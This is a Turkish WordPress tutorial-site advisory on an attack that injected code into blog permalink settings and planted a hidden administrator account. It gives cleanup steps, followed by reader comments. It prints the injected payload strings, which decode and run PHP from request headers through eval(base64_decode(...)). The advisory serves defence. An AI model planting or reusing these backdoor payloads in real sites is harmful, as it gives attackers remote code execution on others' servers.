En çok ihtiyaç duyduğunuzda güvenilir WordPress eğitimleri.
WordPress Başlangıç Rehberi
WPB Kupası
25 Milyon+
Eklentilerimizi kullanan web siteleri
16+
Yıllık WordPress deneyimi
3000+
Uzmanlardan WordPress eğitimleri

WordPress SQL Enjeksiyonu – Son Saldırı

Siteler, sitenize kod enjekte eden son bir SQL saldırısından etkileniyor. Bu MySQL enjeksiyonu, kalıcı bağlantılarınızı etkisiz hale getirerek etkiliyor. Sonuç olarak, blog yazılarınızın URL'leri çalışmayacaktır. Bu saldırıda çok sayıda WordPress blogu hedef alındı. Dikkatimize sunduğu için Andy Soward'a teşekkürler.

Bu saldırı nedeniyle kalıcı bağlantı yapınıza aşağıdaki kodlardan biri eklenmişti:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Bu alıntılar sitenizdeki tüm kalıcı bağlantılara eklendi ve yalnızca manuel olarak kaldırılırsa değiştirilebilir.

Bunu düzeltmek için şuraya gidin:

Ayarlar > Permalinks ve yukarıdaki kodu kaldırın ve varsayılan kodunuzu bununla değiştirin.

Yapmanız gereken bir sonraki şey Kullanıcılar'a gitmektir. Birden fazla yönetici olduğunu göreceksiniz. İsimlerini listede görmeyeceksiniz, ancak sayının arttığını göreceksiniz. Bu yüzden yapmanız gereken, tüm kullanıcılara bakmak ve en son kayıt olanı bulmaktır. O kullanıcının üzerine fareyi getirin ve bağlantıyı alın. userid= kodunu bu sayıya 1 ekleyerek değiştirin. Yani görebildiğiniz son kullanıcı #2 kullanıcısı ise, buna 1 ekleyin ve 3 yapın. Gizli yöneticinin ilk adı olarak garip bir kod bulmalısınız. Kodu silin ve onu bir abone yapın. Sonra geri dönün ve onu silin.

Bu sorunu çözecektir. PHPMyAdmin'inize giderek de onu silebilirsiniz. Çünkü kullanıcıyı orada göreceksiniz.

Bu haberi en kısa sürede duyurmak istedik, böylece kullanıcılarımız güncellenebilir. Lütfen blogunuzun enfekte olmadığından emin olun. WordPress'in yakında bir sürüm çıkarmasını umuyoruz.

Ayrıca, WordPress Yönetici Alanınızı güvence altına almak için bu önlemlerden bazılarını uygulamadıysanız.

Açıklama: İçeriğimiz okuyucu desteklidir. Bu, bazı bağlantılarımıza tıklamanız durumunda komisyon kazanabileceğimiz anlamına gelir. WPBeginner'ın nasıl finanse edildiğini, neden önemli olduğunu ve bize nasıl destek olabileceğinizi görün. İşte editöryal sürecimiz.

Nihai WordPress Araç Seti

Araç Kitimize ÜCRETSİZ erişim kazanın - her profesyonelin sahip olması gereken WordPress ile ilgili ürün ve kaynaklardan oluşan bir koleksiyon!

Okuyucu Etkileşimleri

8 CommentsLeave a Reply

  1. Web sitemin veritabanına birkaç gün önce enjeksiyon yapıldı, her gönderi veya sayfa URL'sinin sonuna garip karakterler ve kelimeler eklendi. Ayarlarda: kalıcı bağlantılar veya kullanıcılar menüsünde garip bir şey bulamadım. Bu sorunu çözmek için ne yapmalıyım, lütfen? Hosting şirketimin enfekte veritabanının yedeği de var!

  2. İki kere başıma geldi.

    İlk seferinde wassup eklentisi sql enjeksiyonuydu, bu sefer emin değilim. Barındırma sağlayıcım beni engelledi.

    Hesabımı geri yüklediklerinde wordpress'i kaldıracağım.. Yeter artık!

    • Bu yorum için gerçekten minnettarız, sorun WP Super Cache ile ilgili değildi, WP External Link adlı eklenti olduğuna inanıyoruz. WP-Super Cache'i iki kez kaldırdık ve yeniden yükledik, ancak sonra her şeyin yolunda çalıştığı geliştirme sunucusuyla karşılaştırdık. Fark bu eklentiydi. Bu eklentiyi kaldırdığımızda çalıştı. Şimdi o gönderiyi okuyabilirsiniz.

      Yönetici

      • Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
        So last Super Cache ver. promises to do not html validity check.

        Ah, okuyorum!
        Çok teşekkürler!

Cevap Bırakın

Yorum bırakmayı seçtiğiniz için teşekkürler. Lütfen tüm yorumların yorum politikamıza göre denetlendiğini ve e-posta adresinizin YAYINLANMAYACAĞINI unutmayın. Lütfen isim alanında anahtar kelime KULLANMAYIN. Kişisel ve anlamlı bir sohbet edelim.